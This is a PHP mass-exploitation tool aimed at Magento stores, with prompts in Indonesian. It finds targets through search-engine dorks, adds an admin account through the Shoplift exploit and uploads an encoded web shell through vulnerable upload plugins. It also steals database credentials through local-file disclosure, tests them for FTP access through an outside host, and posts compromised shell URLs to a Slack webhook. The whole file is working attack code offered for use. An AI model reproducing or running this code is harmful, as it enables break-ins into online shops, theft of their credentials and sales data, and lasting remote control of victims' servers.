- <?php
- function logo()
- {
- $logo = "=======================================================\n";
- $logo .= "Magento All in one Exploiter\n";
- $logo .= "Created By Pak Haxor Special Thank To Papah Crew\n";
- $logo .= "Thank To Yogyakarta BlackHat & All Coder Indonesian\n";
- $logo .= "=======================================================\n";
- echo $logo;
- }
- function CurlPost($url, $post = false,$type=null){
- if($type == 1)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- if($type == 2)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- if($post !== false){
- $isi = '';
- foreach($post as $key=>$value){
- $isi .= $key.'='.$value.'&';
- }
- rtrim($isi, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($isi));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- }
- function Jswebforms($site,$file)
- {
- $post = array('files[]'=>"@$file") ;
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$site/js/webforms/upload/");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- curl_close($ch);
- $json = json_decode($data);
- if(isset($json[0]->url))
- {
- $shell = get_content($json[0]->url);
- return (preg_match("/Pak Haxor/",$shell)) ? $json[0]->url : false;
- }
- }
- function ROGMAGE($site,$file)
- {
- $post = array('tuUploadFile'=>"@$file") ;
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$site/js/rokmage_tinymce/tinyupload.php");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- $url = parse_url($site);
- $target = (!isset($url["scheme"]) ? "http://".$site : $url["scheme"]."://".$url["host"]);
- $checkshell = get_content($target."/media/rt-tinymce-uploads/sj.php");
- return $checkshell;
- }
- function webhooksending($text)
- {
- $url = 'https://hooks.slack.com/services/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';
- $ch = curl_init($url);
- $jsonData = array(
- 'text' => $text
- );
- $jsonDataEncoded = json_encode($jsonData);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonDataEncoded);
- curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
- $result = @curl_exec($ch);
- return ($result == "ok") ? true : false ;
- }
- function createshell()
- {
- $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
- $shell = "PD9waHANCmVjaG8gYmFzZTY0X2RlY29kZSgiVUdGcklFaGhlRzl5Iik7DQplY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2lkeCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz4NCjwvZm9ybT4iOw0KaWYoJF9QT1NUWyd1cGxvYWQnXSkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2lkeCddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydpZHgnXVsnbmFtZSddKSkgew0KCWVjaG8gInN1a3NlcyI7DQoJfSBlbHNlIHsNCgllY2hvICJnYWdhbCI7DQoJfQ0KfQ0KPz4=";
- for($i=0;$i<count($ext);$i++)
- {
- $fp = fopen("sj.".$ext[$i], 'a+');
- fwrite($fp, base64_decode($shell));
- fclose($fp);
- }
- return $ext;
- }
- function get_content($url)
- {
- return @file_get_contents($url);
- }
- function FinderPhpMyAdmin($site)
- {
- $x = 1;
- $list = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- );
- if(isset($site))
- {
- echo "\n[+] Searching Phpmyadmin Login : ";
- foreach($list as $path => $test)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result))
- {
- return $site.$test;
- break;
- }
- else if (preg_match("/401 Unauthorized/", $result))
- {
- return $site.$test;
- }
- else
- {
- echo ".";
- }
- }
- }
- }
- function finderAdminer($site)
- {
- $list = array(
- '/adminer.php',
- '/adminer-4.2.6-dev.php',
- '/adminer-4.2.5.php',
- '/adminer-4.2.4.php',
- '/adminer-4.2.3.php',
- '/adminer-4.2.2.php',
- '/adminer-4.2.1.php',
- '/adminer-4.2.0.php',
- '/adminer-4.1.0.php',
- '/adminer-4.0.3.php',
- '/adminer-4.0.2.php',
- '/adminer-4.0.1.php',
- '/adminer-4.0.0.php',
- '/adminer-3.7.1.php',
- '/adminer-3.7.0.php',
- '/adminer-3.6.4.php',
- '/adminer-3.6.3.php',
- '/adminer-3.6.2.php',
- '/adminer-3.6.1.php',
- '/adminer-3.6.0.php',
- '/adminer-3.5.1.php',
- '/adminer-3.5.0.php',
- '/adminer-3.4.0.php',
- '/adminer-3.3.4.php',
- '/adminer-3.3.3.php',
- '/adminer-3.3.2.php',
- '/adminer-3.3.1.php',
- '/adminer-3.3.0.php',
- '/adminer-3.2.2.php',
- '/adminer-3.2.1.php',
- '/adminer-3.2.0.php',
- '/adminer-3.1.0.php',
- '/adminer-3.0.1.php',
- '/adminer-3.0.0.php',
- '/adminer-2.3.2.php',
- '/adminer-2.3.1.php',
- '/adminer-2.3.0.php',
- '/adminer-2.2.1.php',
- '/adminer-2.2.0.php',
- '/adminer-2.1.0.php',
- '/adminer-2.0.0.php',
- '/adminer-1.11.1.php',
- '/adminer-1.11.0.php');
- if(isset($site))
- {
- echo "\n[+] Searching Adminer Login : ";
- foreach($list as $path => $test)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- if (preg_match("/200 OK/", $result))
- {
- return $site.$test;
- break;
- }
- else if (preg_match("/401 Unauthorized/", $result))
- {
- return $site.$test;
- }
- else
- {
- echo ".";
- }
- }
- }
- }
- function ftplogin($host,$user,$pass)
- {
- $con = ftp_connect($host) or die("Couldn't connect");
- ftp_login($con, $user, $pass);
- return is_array(ftp_nlist($con, ".")) ? true : false;
- }
- function GetStr($start,$end,$string){
- $a = explode($start,$string);
- $b = explode($end,$a[1]);
- return $b[0];
- }
- function userFTP($username)
- {
- $user = explode("_",$username);
- return (isset($user[1])) ? $user[1] : $user[0];
- }
- function ReadStdin($prompt, $valid_inputs=null, $default = '') {
- while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
- echo $prompt;
- $input = strtolower(trim(fgets(STDIN)));
- break;
- if(empty($input) && !empty($default)) {
- $input = $default;
- }
- }
- return $input;
- }
- function NameXFile($file)
- {
- $validation = explode('.',$file);
- $ext = array("txt","log","lst");
- for($x=0;$x<count($ext);$x++)
- {
- if($validation[1] == $ext[$x++])
- {
- return true;
- }
- }
- }
- function LoginDownloader($url){
- $link = parse_url($url);
- if(isset($link["scheme"]))
- {
- $data = CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
- array("username" => "pak",
- "password" => "haxor123"),2
- );
- }
- else
- {
- $data = CurlPost("http://$url/downloader",
- array("username" => "pak",
- "password" => "haxor123"),2
- );
- }
- if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
- $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
- $smtp = (preg_match("/Smtp/",$data) ? "Yes" : "No");
- $filemanager = (preg_match("/File_System/",$data) ? "Yes":"No");
- return $permission.
- "\n ==> Smtp : $smtp".
- "\n ==> Filemanager : $filemanager";
- } else {
- return "Failed";
- }
- }
- function getDomain($keyword)
- {
- if($keyword == 1)
- {
- return array($argv[1]);
- }
- }
- function filterDomain($domains)
- {
- $url = parse_url($domains);
- $target = (!isset($url["scheme"]) ? "http://".$domains : $url["scheme"]."://".$url["host"]);
- if(preg_match('/http/',$target))
- {
- $reparse = parse_url($target);
- $domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
- if (!filter_var("http://$domain", FILTER_VALIDATE_URL) === false)
- {
- if($domain !== "")
- {
- $checkdomain = explode('.',$domain);
- if(isset($checkdomain[1]))
- {
- echo $domain;
- return $domain;
- }
- }
- }
- }
- }
- /*DEMO function checkstatusMysqlLogin($host,$user,$pass,$domain = null,$stop = true)
- {
- $mysql = @mysqli_connect($host,$user,$pass);
- $sql = array($host,$user,$pass);
- if(!$mysql)
- {
- if($stop == true)
- {
- return false;
- }
- $recheck = checkstatusMysqlLogin($domain,$user,$pass);
- if(!$recheck)
- {
- $domain = str_replace("www.", "", $domain);
- checkstatusMysqlLogin("mysql.".$domain,$user,$pass,null,true);
- }
- else
- {
- return $sql;
- }
- }
- return $sql;
- }*/
- function wrongpress($read,$angka)
- {
- if(!isset($read) or $read > $angka or !(int)($read) or $read = "")
- {
- echo "Wrong Press !!!";
- die();
- }
- }
- function SearchEngine($dork,$angka)
- {
- $list = array();
- if($angka == 1)
- {
- for($i=0;$i<=1000;$i+=10){
- $search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = filterDomain($link);
- $list[] = $domain;
- }
- }
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 2)
- {
- $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
- for($x=0;$x<=count($ccbing)-1;$x++){
- for($i=0;$i<=1000;$i+=10){
- $search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE",false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = filterDomain($link);
- $fp = fopen("domain.txt", 'a+');
- fwrite($fp, $domain."\n");
- fclose($fp);
- $list[] = $domain;
- }
- }
- }
- echo ".";
- }
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 3)
- {
- for($x=1;$x<=1000;$x+=10){
- $check = CurlPost('http://www.dogpile.com/dogpilecontrol/search/web?qsi='.$x.'&q='.$dork.'&fcoid=4&fcop=results-bottom&fpid=2',false,2);
- preg_match_all('# target="_blank">(.*?)</a>#',$check,$matches);
- foreach($matches[1] as $domain)
- {
- $domain = str_replace("<strong>", "", $domain);
- $domain = str_replace("</strong>", "", $domain);
- $list[] = filterDomain($domain);
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- }
- logo();
- $getdomains = ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
- wrongpress($getdomains,3);
- if($getdomains == 1)
- {
- $dorker = ReadStdin("[1] Bing\n[2] Bing By Country\n[3] Dogpile\nSelected : ",array("keyword"));
- if(isset($dorker))
- {
- wrongpress($dorker,3);
- $url1 = ReadStdin("Masukkan Dork : ",array("keyword"));
- echo "Grabbing : ";
- $get = SearchEngine($url1,$dorker);
- }
- }
- if($getdomains == 2)
- {
- $url2 = ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
- $get =(NameXFile($url2) == true) ? file($url2) : die("Masukkan Nama File Dengan Benar !!!");
- }
- if($getdomains == 3)
- {
- $url3 = ReadStdin("Masukkan url : ",array("keyword"));
- $get = array($url3);
- }
- $addadmin = ReadStdin('Apakah Anda Ingin Menggunakan Shoplift(Magento Add Admin) ? (Y/N): ', array('Y', 'N'));
- $jswebforms = ReadStdin('Apakah Anda Ingin Menggunakan Magento Js Webforms ? (Y/N): ', array('Y', 'N'));
- $lfdScanning = ReadStdin('Apakah Anda Ingin Menggunakan LFD Scanning + magmi + amasty ? (Y/N): ', array('Y', 'N'));
- $rogmage_tinymce = ReadStdin('Apakah Anda Ingin Menggunakan TinyMCE ROGMAGE ? (Y/N): ', array('Y', 'N'));
- $ftpScanning = ReadStdin('Apakah Anda Ingin Menggunakan FTP Scanning(BETA) ? (Y/N): ', array('Y', 'N'));
- $scanningMysqlLogin = ReadStdin('Apakah Anda Ingin Menggunakan mysql finder ? (Y/N): ', array('Y', 'N'));
- //==================GET FROM FILEDATA====================//
- $x=1;
- foreach($get as $domain)
- {
- if($getdomains == 2)
- {
- $domain = str_replace("\r", "", $domain);
- $domain = str_replace("\n", "", $domain);
- }
- echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
- echo "Scanning Url : $domain\n";
- if($addadmin == "y")
- {
- echo "[+] Add Admin Status : ";
- $path = "/admin/Cms_Wysiwyg/directive/index/";
- $post = 'filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
- $exploit = CurlPost($domain.$path,$post,1);
- if(preg_match('#200 OK#', $exploit))
- {
- echo "SUCCESS";
- echo "\n[+] Check Status Login :";
- $postlogin = array("login[username]" => "pak",
- "login[password]" => "haxor123");
- $postlogindownloader = array("username" => "pak",
- "password" => "haxor123");
- $checklogin = CurlPost($domain."/admin",$postlogin,2);
- $downloader = LoginDownloader($domain);
- if(preg_match('/<body id="html-body" class=" adminhtml-dashboard-index">/', $checklogin))
- {
- $total = GetStr("<span class=\"price\">","</span>",$checklogin);
- $average = GetStr('<span class="nowrap" style="font-size:18px;"><span class="price">',"</span>",$checklogin);
- echo "TRUE\n";
- $message = "====================================\n";
- $message .= " ==> Url Login : $domain/admin\n";
- $message .= " ==> Username : pak\n";
- $message .= " ==> Password : haxor123\n";
- $message .= " ==> Lifetime Sales : $total \n";
- $message .= " ==> Average Orders : $average \n";
- $message .= " ==> Downloader : $downloader \n";
- echo $message;
- $fp = fopen("shoplift.txt", 'a+');
- fwrite($fp, $message);
- fclose($fp);
- }
- else
- {
- echo "FALSE\n";
- }
- echo "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++";
- }
- else
- {
- echo "FAILURE\n";
- }
- }
- if($jswebforms == "y")
- {
- if(CurlPost($domain."/js/webforms/upload",false,2) == "[]" or CurlPost($domain."/js/webforms/upload",false,2) == "null")
- {
- echo "[+] Uploaded Shell : ";
- if(!file_exists("sj.php"))
- {
- $ext = createshell();
- }
- else
- {
- $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
- }
- for($i=0;$i<count($ext);$i++)
- {
- echo ".";
- $exploit = Jswebforms($domain,"sj.".$ext[$i]);
- if(isset($exploit))
- {
- echo "\n".$exploit." Success \n";
- $fp = fopen("jswebforms.txt", 'a+');
- webhooksending($exploit."\n");
- fwrite($fp, $exploit."\n");
- fclose($fp);
- break;
- }
- }
- }
- else
- {
- echo "[-] Webforms Not vuln\n";
- }
- }
- if($rogmage_tinymce == "y")
- {
- $checkVuln = CurlPost($domain."/js/rokmage_tinymce/tinyupload.php",false,2);
- echo "[+] Tiny MCE Scanning :";
- if(preg_match('/rt-tinymce-uploads/',$checkVuln))
- {
- echo "VULN\n";
- echo "Uploading Shell :";
- $rogmage = ROGMAGE($domain,"sj.php");
- if(preg_match('/Pak Haxor/',$rogmage))
- {
- echo " $domain/media/rt-tinymce-uploads/sj.php\n";
- $fp = fopen("rogmage.txt", 'a+');
- fwrite($fp, "$domain/media/rt-tinymce-uploads/sj.php\n");
- fclose($fp);
- }
- else
- {
- echo " Shell Not FOUND\n";
- }
- }
- else
- {
- echo "FAILED\n";
- }
- }
- if($lfdScanning == "y")
- {
- $path = array("Amasty" => "/app/etc/local.xml",
- "Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml"
- );
- echo " [+] LFD Scanning :";
- foreach($path as $key => $value)
- {
- $url = parse_url($domain);
- $target = (!isset($url["scheme"]) ? "http://".$domain : $url["scheme"]."://".$url["host"]);
- $lfd = get_content($target.$value);
- if(preg_match("/<host><!/",$lfd))
- {
- echo "Found\n";
- $date = GetStr("<date><![CDATA[","]]></date>",$lfd);
- $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
- $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
- $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
- $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
- $lfdconfig = "\n==============[Mysql Login]===============";
- $lfdconfig .= "\nDomain : $domain";
- $lfdconfig .= "\nDate : $date";
- $lfdconfig .= "\nHost : $host";
- $lfdconfig .= "\nUsername : $username";
- $lfdconfig .= "\nPassword : $password";
- $lfdconfig .= "\nDatabaseName : $dbname";
- $lfdconfig .= "\n=========================================";
- echo $lfdconfig;
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, $lfdconfig);
- fclose($fp);
- if($ftpScanning == "y")
- {
- echo "\n[+] Scanning FTP LOGIN : ";
- $url = parse_url($domain);
- $ftp = get_content("http://www.fccarolinasoccer.com/ftp.php?domain=$domain&username=".userFTP($username)."&password=$password");
- if(preg_match("/SUCCESS/",$ftp))
- {
- echo "SUCCESS\n";
- $ftpinfo = "================================\n";
- $ftpinfo .= "Host : ftp.".$url["host"]."\n";
- $ftpinfo .= "Username : ".userFTP($username)."\n";
- $ftpinfo .= "Password : ".$password."\n";
- $ftpinfo .= "================================\n";
- echo $ftpinfo;
- $fp = fopen("ftpmagento.txt", 'a+');
- fwrite($fp, $ftpinfo);
- fclose($fp);
- }
- else
- {
- echo "Failure\n";
- }
- }
- if($scanningMysqlLogin == "y")
- {
- $finderPhpmyadmin = FinderPhpMyAdmin("$domain");
- if(isset($finderPhpmyadmin))
- {
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, "\nPath Mysql login : $finderPhpmyadmin");
- fclose($fp);
- echo "\n Path Mysql login : $finderPhpmyadmin";
- }
- elseif(!$finderPhpmyadmin)
- {
- $adminer = finderAdminer("$domain");
- if(isset($adminer))
- {
- $fp = fopen("lfdconfig.txt", 'a+');
- fwrite($fp, "\nPath Mysql login : $adminer ");
- fclose($fp);
- echo "\n Path Mysql login : $adminer ";
- }
- else
- {
- /*DEMO{
- echo "\n[+] Manual MYSQL CHECKED :";
- $manualMYSQL = checkstatusMysqlLogin($host,$username,$password,"$domain");
- if($manualMYSQL !== false)
- {
- echo "SUCCESS\n";
- webhooksending("CAN LOGIN MANUAL == >
- HOST :".$manualMYSQL[0]
- ."USER :".$manualMYSQL[1]
- ."Passowrd :".$manualMYSQL[2]."\n");
- }
- else
- {*/
- echo "\nFAILED";
- /*DEMO }*/
- }
- }
- }
- break;
- }
- else
- {
- echo " \n==>[$key] Not Found";
- }
- }
- }
- }
- ?>